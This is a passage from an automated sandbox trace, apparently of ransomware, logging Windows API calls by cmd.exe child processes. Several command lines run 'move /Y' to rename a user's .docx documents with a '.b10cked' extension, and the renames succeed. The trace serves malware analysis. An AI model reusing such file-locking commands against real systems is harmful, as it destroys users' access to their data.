Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb24 | out: phkResult=0x16eb24*=0x40) returned 0x0 [0136.620] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x90, lpcbData=0x16eb28*=0x1000) returned 0x2 [0136.620] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x1, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x1, lpcbData=0x16eb28*=0x1000) returned 0x2 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x0, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x40, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x40, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x40, lpcbData=0x16eb28*=0x1000) returned 0x2 [0136.621] RegCloseKey (hKey=0x40) returned 0x0 [0136.621] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb24 | out: phkResult=0x16eb24*=0x40) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x40, lpcbData=0x16eb28*=0x1000) returned 0x2 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x1, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x1, lpcbData=0x16eb28*=0x1000) returned 0x2 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x0, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x9, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x9, lpcbData=0x16eb28*=0x4) returned 0x0 [0136.621] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x9, lpcbData=0x16eb28*=0x1000) returned 0x2 [0136.621] RegCloseKey (hKey=0x40) returned 0x0 [0136.621] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636b [0136.621] srand (_Seed=0x5b88636b) [0136.621] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked\"" [0136.621] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked\"" [0136.621] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.621] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2418c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.622] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.622] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.622] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.622] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.622] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.622] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.622] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.622] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.622] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.622] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.622] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.622] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.622] GetEnvironmentStringsW () returned 0x2422b8* [0136.622] FreeEnvironmentStringsW (penv=0x2422b8) returned 1 [0136.622] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.622] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.622] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.622] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.622] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.622] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.622] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.622] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.622] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.622] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.622] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f8f0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.622] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f8f0, lpFilePart=0x16f8ec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f8ec*="Desktop") returned 0x18 [0136.622] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.623] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f66c | out: lpFindFileData=0x16f66c) returned 0x23fff8 [0136.623] FindClose (in: hFindFile=0x23fff8 | out: hFindFile=0x23fff8) returned 1 [0136.623] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f66c | out: lpFindFileData=0x16f66c) returned 0x23fff8 [0136.623] FindClose (in: hFindFile=0x23fff8 | out: hFindFile=0x23fff8) returned 1 [0136.623] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f66c | out: lpFindFileData=0x16f66c) returned 0x23fff8 [0136.623] FindClose (in: hFindFile=0x23fff8 | out: hFindFile=0x23fff8) returned 1 [0136.623] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.623] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.623] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0136.623] GetEnvironmentStringsW () returned 0x242ad8* [0136.623] FreeEnvironmentStringsW (penv=0x242ad8) returned 1 [0136.623] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.624] GetConsoleOutputCP () returned 0x1b5 [0136.624] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.624] GetUserDefaultLCID () returned 0x409 [0136.624] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fa30, cchData=128 | out: lpLCData="0") returned 2 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fa30, cchData=128 | out: lpLCData="0") returned 2 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fa30, cchData=128 | out: lpLCData="1") returned 2 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0136.625] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.625] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.626] GetConsoleTitleW (in: lpConsoleTitle=0x2308d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.626] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.626] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.626] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.626] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.627] _wcsicmp (_String1="move", _String2=")") returned 68 [0136.627] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0136.627] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0136.627] _wcsicmp (_String1="IF", _String2="move") returned -4 [0136.627] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0136.627] _wcsicmp (_String1="REM", _String2="move") returned 5 [0136.627] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0136.629] GetConsoleTitleW (in: lpConsoleTitle=0x16f728, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.629] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0136.629] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0136.629] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0136.629] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0136.630] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0136.630] _wcsicmp (_String1="move", _String2="CD") returned 10 [0136.630] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0136.630] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0136.630] _wcsicmp (_String1="move", _String2="REN") returned -5 [0136.630] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0136.630] _wcsicmp (_String1="move", _String2="SET") returned -6 [0136.630] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0136.630] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0136.630] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0136.630] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0136.630] _wcsicmp (_String1="move", _String2="MD") returned 11 [0136.630] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0136.630] _wcsicmp (_String1="move", _String2="RD") returned -5 [0136.630] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0136.630] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0136.630] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0136.630] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0136.630] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0136.630] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0136.630] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0136.630] _wcsicmp (_String1="move", _String2="VER") returned -9 [0136.630] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0136.630] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0136.630] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0136.630] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0136.630] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0136.630] _wcsicmp (_String1="move", _String2="START") returned -6 [0136.630] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0136.630] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0136.630] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0136.631] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.631] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.631] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f4e4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f4dc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f4dc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.632] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.633] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.633] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.633] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0136.633] _wcsicmp (_String1="2VGMMR~1.DOC", _String2=".") returned 4 [0136.633] _wcsicmp (_String1="2VGMMR~1.DOC", _String2="..") returned 4 [0136.633] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2vgmmr~1.doc")) returned 0x20 [0136.633] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x241d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.633] SetErrorMode (uMode=0x0) returned 0x0 [0136.633] SetErrorMode (uMode=0x1) returned 0x0 [0136.633] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC", nBufferLength=0x104, lpBuffer=0x16ee6c, lpFilePart=0x16ee54 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC", lpFilePart=0x16ee54*="2VGMMR~1.DOC") returned 0x26 [0136.633] SetErrorMode (uMode=0x0) returned 0x1 [0136.633] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0136.634] _wcsicmp (_String1="2VGMMR~1.DOC", _String2=".") returned 4 [0136.634] _wcsicmp (_String1="2VGMMR~1.DOC", _String2="..") returned 4 [0136.634] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2vgmmr~1.doc")) returned 0x20 [0136.634] SetErrorMode (uMode=0x0) returned 0x0 [0136.634] SetErrorMode (uMode=0x1) returned 0x0 [0136.634] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC", nBufferLength=0x104, lpBuffer=0x16f2e8, lpFilePart=0x16f080 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC", lpFilePart=0x16f080*="2VGMMR~1.DOC") returned 0x26 [0136.634] SetErrorMode (uMode=0x0) returned 0x1 [0136.634] SetErrorMode (uMode=0x0) returned 0x0 [0136.634] SetErrorMode (uMode=0x1) returned 0x0 [0136.634] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked", nBufferLength=0x104, lpBuffer=0x16f4f0, lpFilePart=0x16f080 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked", lpFilePart=0x16f080*="2VgMmRhPzB7.docx.b10cked") returned 0x32 [0136.634] SetErrorMode (uMode=0x0) returned 0x1 [0136.634] SetLastError (dwErrCode=0x0) [0136.634] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2vgmmrhpzb7.docx.b10cked")) returned 0xffffffff [0136.634] GetLastError () returned 0x2 [0136.634] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x16e9fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e9fc) returned 0x230f08 [0136.634] FindNextFileW (in: hFindFile=0x230f08, lpFindFileData=0x16e9fc | out: lpFindFileData=0x16e9fc) returned 0 [0136.635] GetLastError () returned 0x12 [0136.635] FindClose (in: hFindFile=0x230f08 | out: hFindFile=0x230f08) returned 1 [0136.636] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x241ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x241ae0) returned 0x230f08 [0136.636] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked", nBufferLength=0x104, lpBuffer=0x16ec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked", lpFilePart=0x0) returned 0x32 [0136.636] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx", nBufferLength=0x104, lpBuffer=0x16ec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx", lpFilePart=0x0) returned 0x2a [0136.636] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\2vgmmrhpzb7.docx")) returned 0x20 [0136.636] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\2vgmmrhpzb7.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2vgmmrhpzb7.docx.b10cked"), dwFlags=0x3) returned 1 [0136.637] FindClose (in: hFindFile=0x230f08 | out: hFindFile=0x230f08) returned 1 [0136.637] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ec48 | out: _Buffer=" 1") returned 9 [0136.637] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.637] GetFileType (hFile=0x7) returned 0x2 [0136.637] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.637] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ebd4 | out: lpMode=0x16ebd4) returned 1 [0136.704] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.704] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ec08 | out: lpConsoleScreenBufferInfo=0x16ec08) returned 1 [0136.704] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0136.704] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16ec48 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0136.704] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16ec2c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16ec2c*=0x1a) returned 1 [0136.705] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.705] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.705] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.705] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.705] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.705] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.705] SetConsoleInputExeNameW () returned 0x1 [0136.705] GetConsoleOutputCP () returned 0x1b5 [0136.705] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.705] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.705] exit (_Code=0) Process: id = "136" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16660" os_pid = "0xc1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13595 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13596 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13597 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13598 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" 